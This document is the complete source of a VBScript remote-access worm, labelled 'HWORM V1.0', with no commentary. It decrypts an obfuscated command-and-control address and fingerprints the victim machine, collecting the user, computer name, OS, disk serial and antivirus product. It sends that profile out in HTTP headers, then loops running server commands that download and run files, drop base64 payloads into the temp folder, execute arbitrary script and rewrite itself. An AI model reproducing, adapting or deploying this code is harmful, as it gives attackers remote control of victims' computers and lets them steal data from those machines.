On error resume Nextj = array("WScript.Shell","Scripting.filesystemobject","Sh

1. On error resume Next
2. j = array("WScript.Shell","Scripting.filesystemobject","Shell.Application","msxml2.xmlhttp","adodb.stream")
3. g = array("HKCU","HKLM","HKCU\System\CurrentControlSet\défault","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\")
4. y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct")
5. H=host
6. Set w = WScript
7. set sh = Cr(0)
8. set fs = Cr(1)
9. Set o=Cr(3)
10. Set st = Cr(4)
11. vn=" jjj"
12. U=""
13. ch = chrw(34)
14. c = chrw(92)
15. fu = w.scriptfullname
16. wn=w.scriptname
17. NT="-"
18. function go(m)
19. if m=4 then
20. Set B=GetObject(y(3)).InstancesOf(y(4))
21. for each a in b
22. go=a.displayName
23. exit for
24. next
25. Set B=GetObject(y(3) & "2").InstancesOf(y(4))
26. for each a in b
27. go=a.displayName
28. exit for
29. next
30. if go="" then go="Not-found"
31. else
32. Set B=GetObject(y(0)).InstancesOf(y(m))
33. for each a in b
34. if m = 1 then
35. go=a.volumeserialnumber
36. elseif m = 2 then
37. go=a.caption
38. end if
39. exit for
40. next
41. end if
42. end function
43. Function host
44. Dim oXMLHTTP
45. Dim oStream
46. Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP.3.0")
47. oXMLHTTP.Open "GET", decrypt("\DA@@);?EQ@GQR\^=P[]:BRD;ZM#PkW#f","405033"), False
48. oXMLHTTP.Send
49. If oXMLHTTP.Status = 200 Then
50. host = oXMLHTTP.responseText
51. End If
52. End Function
53. Function Cr(N)
54. Set Cr = CreateObject(j(N))
55. End Function
56. function Ex(s)
57. Ex = sh.ExpandEnvironmentStrings(s)
58. end function
59. function Pt(C,A)
60. Pt=""
61. Set X=Cr(3)
62. X.Open "POST","http://"&H&"/"&C,false
63. X.setrequestheader "User-Agent:",information
64. X.send A
65. Pt=X.responsetext
66. set X=nothing
67. end Function
68. function information
69. on error resume Next
70. Set f = fs.GetFile(fu)
71. inf = ""
72. if inf = "" then
73. inf = go(1) & spl
74. inf = inf & vn & NT & spl
75. inf = inf & ex("%computername%") & spl
76. inf = inf & ex("%username%") & spl
77. inf = inf & go(2) & spl
78. inf = inf & "HWORM V1.0" & spl
79. inf = inf & go(4) & spl
80. inf = inf & U & "!"& FormatDateTime( f.DateCreated,2)
81. information = inf
82. else
83. information = inf
84. end if
85. end Function
86.  
87. Sub Ns
88. on error resume next
89. If fs.FileExists(dr) Then
90. else
91.  
92. '%ScTk%
93.  
94.  
95. End If
96. end Sub
97.  
98.  
99. if fs.fileexists(ex("%Windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
100. NT="+"
101. end if
102. U= sh.regread(g(2))
103. if U="" then
104. if mid(fu,2)=":\" & wn then
105. U="TRUE"
106. sh.regwrite g(2), U, g(4)
107. else
108. U="FALSE"
109. sh.regwrite g(2), U, g(4)
110. end if
111. end if
112. spl="123139C2C7E5870FC4"
113. while true
114. s=split(Pt("47FE1305DAAEEB70",""),spl)
115. select case s(0)
116. Case "5DF0AEAF4F15BFB1"
117. sitedownloader s(1),s(2)
118. Case "5DF59151AA"
119. sleep = Eval (s(1))
120. case "excecute"
121. execute s(1)
122. case "5DFCDC52"
123. Dim mfile
124. outFile = Ex("%temp%") & "\" & s(2)
125. mfile = decodeBase64(s(1))
126. writeBytes outFile, mfile
127. sh.Run outFile,0,True
128. case "7C6D51"
129. set wr = fs.OpenTextFile(fu,1)
130. f = wr.ReadAll
131. wr.close()
132. f = replace(f,vn,s(1))
133. set wr = fs.OpenTextFile(fu,2,false)
134. wr.Write f
135. wr.close()
136. sh.run "wscript.exe //B " & ch & fu & ch, 6
137. w.quit
138. case "5B85AF42E710"
139. set wr = fs.OpenTextFile(fu,2,false)
140. wr.Write s(1)
141. wr.Close()
142. sh.run "wscript.exe //B " & ch & fu & ch, 6
143. pt "47FE130239B49532F5",""
144. w.quit
145. case "6DD6"
146. W.quit
147. case "5B9BBEE44B148293C9"
148. S(1) = replace(S(1),"%f",fu)
149. S(1) = replace(S(1),"%n",wn)
150. S(1) = replace(S(1),"%sfdr",dr)
151. pt "47FE13022765F07788190657",""
152. execute S(1)
153. w.quit
154. end Select
155. W.Sleep 4000
156.  
157. Ns
158. Wend
159. Sub sitedownloader (fileurl,filename)
160. strlink = fileurl
161. strsaveto = Ex("%temp%") & "\" & filename
162. o.open "get", strlink, False
163. o.send
164. If fs.fileexists (strsaveto) Then
165. fs.deletefile (strsaveto)
166. End If
167. If o.status = 200 Then
168. With st
169. .type = 1
170. .open
171. .write o.responsebody
172. .savetofile strsaveto
173. .close
174. End With
175. Set st = Nothing
176. End If
177. If fs.fileexists(strsaveto) Then
178. sh.run fs.getfile (strsaveto).shortpath
179. End If
180. End Sub
181. private function decodeBase64(base64)
182. dim DM, EL
183. Set DM = CreateObject("Microsoft.XMLDOM")
184. Set EL = DM.createElement("tmp")
185. EL.DataType = "bin.base64"
186. EL.Text = base64
187. decodeBase64 = EL.NodeTypedValue
188. end Function
189. private Sub writeBytes(file, bytes)
190. Dim binaryStream
191. Set binaryStream = CreateObject("ADODB.Stream")
192. binaryStream.Type = 1
193. binaryStream.Open
194. binaryStream.Write bytes
195. binaryStream.SaveToFile file, 2
196. End Sub
197. function decrypt(Data, key)
198. Dim I, Z
199. Dim C
200. Dim Code
201. Dim Result
202.  
203. Result=""
204. if len(Data) > 0 then
205. Z=len(key)
206. for I = 1 to len(Data)
207. Code=Asc(mid(key, ((I - 1) mod Z + 1)))
208. if Asc(Mid(Data, I, 1)) >= 128 then
209. C= Chr(Asc(Mid(Data, I, 1)) xor (Code and &H7F))
210. elseif Asc(Mid(Data, I, 1)) >= 64 then
211. C= Chr(Asc(Mid(Data, I, 1)) xor (Code and &H3F))
212. elseif Asc(Mid(Data, I, 1)) >= 32 then
213. C= Chr(Asc(Mid(Data, I, 1)) xor (Code and &H1F))
214. else
215. C=Mid(Data, I, 1)
216. End If
217. Result=Result & C
218. next
219. end if
220. decrypt = Result
221. End Function